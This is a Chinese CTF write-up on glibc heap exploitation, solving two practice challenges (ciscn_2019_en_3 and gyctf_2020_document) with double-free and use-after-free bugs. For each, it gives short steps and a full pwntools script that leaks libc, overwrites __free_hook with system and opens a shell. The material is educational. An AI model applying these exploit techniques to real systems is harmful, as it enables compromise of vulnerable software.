堆复习3-double—free

ciscn_2019_en_3

1、首先利用puts函数只要输入长度为8就能泄露出一个基地址

2、申请两个chunk，chunk1内容为/bin/sh

3、对chunk0进行double free并对__free_hook劫持，改为system

4、释放chunk1

比较基础，只用到了double free和free_hook劫持

exp：

#coding=utf-8
from pwn import *
from LibcSearcher import*
context.log_level='debug'

pe='./ciscn_2019_en_3'
libc_23='./libc-2.23.so'
libc_27='./libc-2.27.so'
ip,port = 'node3.buuoj.cn',27452
elf=ELF(pe)
libc=ELF(libc_27)

if args['REMOTE']:
    p = remote(ip,port)
else:
    p = process(pe)

def get_one():  #one_gadget
    if(arch == '64'):
        if(version == '2.23'):
            #one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
            one = [0x45226, 0x4527a, 0xf0364, 0xf1207]

        if (version == '2.27'):
            #one = [0x4f2c5 , 0x4f322 , 0x10a38c]
            one = [0x4f365, 0x4f3c2, 0x10a45c]

    return one

def add(size, content):
	p.recvuntil("Input your choice:")
	p.sendline('1')
	p.recvuntil("Please input the size of story: \n")
	p.sendline(str(size))
	p.recvuntil("please inpute the story: \n")
	p.sendline(content)
 
def delete(index):
	p.recvuntil("Input your choice:")
	p.sendline('4')
	p.recvuntil("Please input the index:\n")
	p.sendline(str(index))

 

def main():
	p.sendlineafter('name?\n','123')
	p.sendlineafter('input your ID.\n','a'*8)
	data=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x5f6a0-231
	success('data:' + hex(data))
	base=data-libc.symbols['__libc_start_main']
	success('base:' + hex(base))
	success('libc_start_main_offset:' + hex(libc.symbols['__libc_start_main']))
	free_hook=base+libc.symbols['__free_hook']
	system=base+libc.symbols['system']
	success('system_offset:' + hex(libc.symbols['system']))
	success('system:' + hex(system))
	success('free_hook:' + hex(free_hook))
	success('free_hook_offset:' + hex(libc.symbols['__free_hook']))

	# gdb.attach(p)

	add(0x20,'aaaa')
	# add(0x20,'bbbb')
	add(0x20,'/bin/sh')
	delete(0)
	delete(0)
	add(0x20,p64(free_hook))
	add(0x20,p64(free_hook))
	add(0x20,p64(system))
	delete(1)
	# gdb.attach(p)
	p.interactive()

if __name__ == '__main__':
	main()

gyctf_2020_document

同样是free_hook劫持的问题

1、有uaf，可以直接泄露libc地址
2、泄露libc后，由于第一个chunk被释放了，并且edit函数编辑的是chunk+0x10的偏移位置，所以我们再申请两个chunk
3、这个时候，我们就可以发现idx为0的头部chunk指向了，idx为3的头部chunk的pre_size位，这时候已经overlap了，所以直接覆盖chunk3指向堆的那个偏移，并且要与free_hook或者malloc_hook的偏移相差0x10
4、经过调试发现free_hook周围都是0，覆盖了free_hook为system

5、释放chunk1拿到shell

exp：

#coding=utf-8
from pwn import *
from LibcSearcher import*
context.log_level='debug'

pe='./gyctf_2020_document'
libc_23='/lib/x86_64-linux-gnu/libc.so.6'
libc_27='./libc-2.27.so'
ip,port = 'node3.buuoj.cn',26272
elf=ELF(pe)
libc=ELF(libc_23)

if args['REMOTE']:
    p = remote(ip,port)
else:
    p = process(pe)

def get_one():  #one_gadget
    if(arch == '64'):
        if(version == '2.23'):
            #one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
            one = [0x45226, 0x4527a, 0xf0364, 0xf1207]

        if (version == '2.27'):
            #one = [0x4f2c5 , 0x4f322 , 0x10a38c]
            one = [0x4f365, 0x4f3c2, 0x10a45c]

    return one


def add(name,sex,context):
    p.sendafter('Give me your choice : ','1')
    p.sendafter('input name',str(name))
    p.sendafter('input sex',str(sex))
    p.sendafter('input information',str(context))

def show(index):
    p.sendafter('Give me your choice :','2')
    p.sendlineafter('Give me your index :',str(index))
    p.recv()
    data=u64(p.recvuntil('\x7f').ljust(8, '\x00'))-0x3a4428
    success('data : ' + hex(data))

def edit(index,sex,context):
    p.sendafter('Give me your choice :','3')
    p.sendafter('Give me your index :',str(index))
    p.sendafter('Are you sure change sex?',str(sex))
    p.sendafter('Now change information',str(context))

def remove(index):
    p.sendafter('Give me your choice :','4') 
    p.sendafter('Give me your index :',str(index))   

def main():
    add('aaaaaaaa','w','\x00'*112)#0
    add('bbbbbbbb','W','\x00'*112)#1
    remove(0)


    #show
    p.sendafter('Give me your choice :','2')
    p.sendlineafter('Give me your index :','0')
    p.recv()
    libc_start_main_addr=u64(p.recvuntil('\x7f').ljust(8, '\x00'))-0x3a4428
    success('libc_start_main_addr : ' + hex(libc_start_main_addr))
    print(type(data))
    #libc
    bin_sh_libc=next(libc.search("/bin/sh"))
    system_libc=libc.symbols['system']
    libc_start_main_libc=libc.symbols['__libc_start_main']
    free_hook=libc.symbols['__free_hook']
    offset=libc_start_main_addr-libc_start_main_libc
    free_hook_addr=free_hook+offset
    system_addr=system_libc+offset
    bin_addr=bin_sh_libc+offset
    success('free_hook: ' + hex(free_hook_addr))
    success("system: " + hex(system_addr))
    success("bin_addr: " + hex(bin_addr))
    gdb.attach(p)
    add('/bin/sh\x00','W','\x11'*112)#2
    remove(1)
    add('/bin/sh\x00','W','\x22'*112)#3
    payload=p64(0)+p64(0x21)+p64(free_hook_addr-0x10)+p64(0x1)+p64(0)+p64(0x51)+p64(0)*8
    edit(0,'Y',payload)
    edit(3,'Y',p64(system_addr)+p64(0)*13)
    remove(1)
    p.interactive()

if __name__ == '__main__':
	main()